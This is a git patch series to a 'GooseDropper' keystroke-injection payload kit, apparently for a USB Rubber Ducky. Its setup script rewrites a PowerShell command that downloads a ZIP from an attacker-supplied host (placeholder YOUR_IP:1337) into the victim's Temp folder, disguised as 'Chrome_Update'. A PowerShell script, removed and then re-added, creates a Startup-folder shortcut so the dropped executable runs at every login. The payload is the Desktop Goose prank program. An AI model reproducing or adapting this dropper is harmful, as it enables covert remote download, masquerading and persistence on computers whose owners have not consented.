From 9791e1b886d694a5d1ae46469bd21ffaf31a7035 Mon Sep 17 00:00:00 2001 From: Fr3ki Date: Tue, 31 Oct 2023 16:29:20 -0600 Subject: [PATCH 1/2] Fix bug with URLs and add option to bypass the ZIP folder creation --- Duckyscripts/GooseDropper/PersistentGoose.ps1 | 6 ---- Duckyscripts/GooseDropper/linux_setup.sh | 30 ++++++++++++------- 2 files changed, 19 insertions(+), 17 deletions(-) delete mode 100644 Duckyscripts/GooseDropper/PersistentGoose.ps1 diff --git a/Duckyscripts/GooseDropper/PersistentGoose.ps1 b/Duckyscripts/GooseDropper/PersistentGoose.ps1 deleted file mode 100644 index 94e731b..0000000 --- a/Duckyscripts/GooseDropper/PersistentGoose.ps1 +++ /dev/null @@ -1,6 +0,0 @@ -$WScriptShell = New-Object -ComObject WScript.Shell -$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe" -$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk" -$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile) -$Shortcut.TargetPath = $TargetFile -$Shortcut.Save() \ No newline at end of file diff --git a/Duckyscripts/GooseDropper/linux_setup.sh b/Duckyscripts/GooseDropper/linux_setup.sh index 0782277..62b7c7e 100644 --- a/Duckyscripts/GooseDropper/linux_setup.sh +++ b/Duckyscripts/GooseDropper/linux_setup.sh @@ -21,9 +21,9 @@ elif [ "${DL}" == "2" ]; then #Get your URL read -p "Enter your URL: " SRC - + SRC="$(echo "$SRC" | sed 's/\//\\\//g')" #Add your URL to the payload - sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt + sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt #Remind users to have the zip ready echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL" @@ -36,21 +36,29 @@ else fi +read -p "Create ZIP file to deliver Desktop Goose? [Y/N]: " COMP + #Check if Desktop Goose is present in this directory GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')" -if [ "${GOOSE}" == "" ]; +if [ "${COMP,,}" == "y" ]; then - echo "Desktop Goose is not present in this directory, download it, or move it here" - exit + if [ "${GOOSE}" == "" ]; + then + echo "Desktop Goose is not present in this directory, download it, or move it here" + exit + + else + unzip "Desktop Goose v0.31.zip" + mv "Desktop Goose v0.31/DesktopGoose v0.31" Update + mv PersistentGoose.ps1 Update/ + zip -r Chrome_Update.zip Update + rm -rf "Desktop Goose v0.31"* Update + clear + fi else - unzip "Desktop Goose v0.31.zip" - mv "Desktop Goose v0.31/DesktopGoose v0.31" Update - mv PersistentGoose.ps1 Update/ - zip -r Chrome_Update.zip Update - rm -rf "Desktop Goose v0.31"* Update - clear + break fi read -p "Configure Persistence? [Y/N]: " PERSIST From 578fb6b512e6cc944a1e952f53e5181e5543c586 Mon Sep 17 00:00:00 2001 From: Fr3ki Date: Tue, 31 Oct 2023 16:33:00 -0600 Subject: [PATCH 2/2] Fix bug with URLs and add option to bypass the ZIP folder creation --- Duckyscripts/GooseDropper/PersistentGoose.ps1 | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 Duckyscripts/GooseDropper/PersistentGoose.ps1 diff --git a/Duckyscripts/GooseDropper/PersistentGoose.ps1 b/Duckyscripts/GooseDropper/PersistentGoose.ps1 new file mode 100644 index 0000000..94e731b --- /dev/null +++ b/Duckyscripts/GooseDropper/PersistentGoose.ps1 @@ -0,0 +1,6 @@ +$WScriptShell = New-Object -ComObject WScript.Shell +$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe" +$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk" +$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile) +$Shortcut.TargetPath = $TargetFile +$Shortcut.Save() \ No newline at end of file